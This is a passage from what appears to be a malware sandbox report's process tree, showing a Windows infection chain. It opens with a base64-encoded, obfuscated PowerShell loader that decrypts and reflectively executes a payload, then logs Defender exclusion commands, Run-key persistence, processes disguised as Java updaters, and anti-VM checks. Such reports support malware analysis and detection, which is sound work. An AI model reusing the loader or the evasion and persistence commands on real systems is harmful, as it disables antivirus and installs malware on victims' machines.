hnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Command and Scripting Interpreter: PowerShell
PID:7796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
PID:7352
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10370350101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10370350101\u75a1_003.exe"6⤵PID:6192
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:6356
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
PID:7164
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵PID:6408
-
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵PID:7044
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵PID:7552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10370360101\fabfe06880.exe"C:\Users\Admin\AppData\Local\Temp\10370360101\fabfe06880.exe"6⤵PID:8092
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:25564
-
-
-
C:\Users\Admin\AppData\Local\Temp\10370380101\8LfjZ9b.exe"C:\Users\Admin\AppData\Local\Temp\10370380101\8LfjZ9b.exe"6⤵PID:8224
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:18084
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1228
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:5888
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5780
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:6116
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe"1⤵PID:3884
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe2⤵PID:3972
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe3⤵PID:1504
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport_platform.exe"4⤵
- Modifies registry key
PID:4544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe\"'"4⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe4⤵
- Command and Scripting Interpreter: PowerShell
PID:1220
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe"1⤵PID:1672
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe2⤵PID:3212
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe3⤵PID:4464
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe4⤵PID:2152
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe5⤵PID:3184
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_service.exe"6⤵
- Modifies registry key
PID:4876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe\"'"6⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
PID:4564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe6⤵
- Command and Scripting Interpreter: PowerShell
PID:5212
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe"1⤵PID:5252
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe2⤵PID:5608
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe3⤵PID:1848
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe4⤵PID:1980
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe5⤵PID:3928
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe6⤵PID:5340
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe7⤵PID:1884
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe8⤵PID:632
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe9⤵PID:5788
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe10⤵PID:2152
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe11⤵PID:4572
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe12⤵PID:5204
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe13⤵PID:4416
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe14⤵PID:5980
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe15⤵PID:5276
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe16⤵PID:5804
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe17⤵PID:3848
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_update.exe"18⤵
- Modifies registry key
PID:4216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe\"'"18⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
PID:784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe18⤵
- Command and Scripting Interpreter: PowerShell
PID:5624 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV119⤵PID:2140
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe"1⤵PID:4500
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe2⤵PID:3908
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe3⤵PID:5184
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe4⤵PID:2264
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe5⤵PID:2324
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe6⤵PID:5204
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe7⤵PID:4468
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe8⤵PID:1188
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe9⤵PID:4112
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe10⤵PID:2832
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe11⤵PID:4712
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe12⤵PID:3168
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe13⤵PID:1856
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe14⤵PID:4424
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe15⤵PID:1980
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe16⤵PID:4832
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe17⤵PID:3228
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime_service.exe"18⤵
- Modifies registry key
PID:220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe\"'"18⤵
- Command and Scripting Interpreter: PowerShell
PID:696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe18⤵
- Command and Scripting Interpreter: PowerShell
PID:4736
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe"1⤵PID:2152
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe2⤵PID:1996
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe3⤵PID:5100
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe4⤵PID:5132
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe5⤵PID:5956
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe6⤵PID:4772
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe7⤵PID:4380
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe8⤵PID:2380
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe9⤵PID:6068
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe10⤵PID:4424
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime_platform.exe"11⤵
- Modifies registry key
PID:2432 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:1484
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe\"'"11⤵
- Command and Scripting Interpreter: PowerShell
PID:4860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe11⤵
- Command and Scripting Interpreter: PowerShell
PID:1648
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe"1⤵PID:5184
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe2⤵PID:696
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe3⤵PID:5804
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe4⤵PID:2168
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe5⤵PID:5608
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe6⤵PID:3596
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe7⤵PID:5956
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe8⤵PID:2260
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe9⤵PID:1916
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe10⤵PID:3804
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe11⤵PID:1656
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe12⤵PID:5732
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe13⤵PID:2308
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe14⤵PID:5340
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdaterw.exe"15⤵
- Modifies registry key
PID:3620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdaterw.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe\"'"15⤵
- Command and Scripting Interpreter: PowerShell
PID:5180 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:4572
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe15⤵
- Command and Scripting Interpreter: PowerShell
PID:5288
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe"1⤵PID:4620
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe2⤵PID:4336
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe3⤵PID:3212
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe4⤵PID:1848
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe5⤵PID:3936
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe6⤵PID:1644
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe7⤵PID:2032
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe8⤵PID:2436
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe9⤵PID:3208
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe10⤵PID:764
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe11⤵PID:5316
-
